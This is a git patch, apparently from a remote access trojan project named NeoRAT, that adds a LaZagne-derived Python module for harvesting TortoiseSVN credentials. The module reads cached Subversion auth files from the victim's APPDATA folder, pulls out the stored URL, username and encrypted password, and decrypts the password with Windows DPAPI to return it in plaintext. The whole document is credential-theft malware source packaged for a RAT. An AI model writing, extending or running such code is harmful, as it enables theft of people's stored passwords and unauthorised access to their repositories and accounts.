From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001 From: AL-LCL Date: Fri, 19 May 2023 11:01:49 +0200 Subject: NeoRAT --- .../lazagne/softwares/svn/__init__.py | 0 .../lazagne/softwares/svn/tortoise.py | 68 ++++++++++++++++++++++ 2 files changed, 68 insertions(+) create mode 100644 foreign/client_handling/lazagne/softwares/svn/__init__.py create mode 100644 foreign/client_handling/lazagne/softwares/svn/tortoise.py (limited to 'foreign/client_handling/lazagne/softwares/svn') diff --git a/foreign/client_handling/lazagne/softwares/svn/__init__.py b/foreign/client_handling/lazagne/softwares/svn/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/foreign/client_handling/lazagne/softwares/svn/tortoise.py b/foreign/client_handling/lazagne/softwares/svn/tortoise.py new file mode 100644 index 0000000..dfa5c4d --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/svn/tortoise.py @@ -0,0 +1,68 @@ +# -*- coding: utf-8 -*- +import base64 + +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.winstructure import Win32CryptUnprotectData +from foreign.client_handling.lazagne.config.constant import constant + +import os + + +class Tortoise(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'tortoise', 'svn', winapi_used=True) + + def run(self): + pwd_found = [] + path = os.path.join(constant.profile["APPDATA"], u'Subversion\\auth\\svn.simple') + if os.path.exists(path): + for root, dirs, files in os.walk(path + os.sep): + for filename in files: + f = open(os.path.join(path, filename), 'r') + url = '' + username = '' + result = '' + + i = 0 + # password + for line in f: + if i == -1: + result = line.replace('\n', '') + break + if line.startswith('password'): + i = -3 + i += 1 + + i = 0 + # url + for line in f: + if i == -1: + url = line.replace('\n', '') + break + if line.startswith('svn:realmstring'): + i = -3 + i += 1 + + i = 0 + + # username + for line in f: + if i == -1: + username = line.replace('\n', '') + break + if line.startswith('username'): + i = -3 + i += 1 + + # encrypted the password + if result: + try: + password = Win32CryptUnprotectData(base64.b64decode(result), is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi) + pwd_found.append({ + 'URL': url, + 'Login': username, + 'Password': str(password) + }) + except Exception: + pass + return pwd_found -- cgit v1.2.3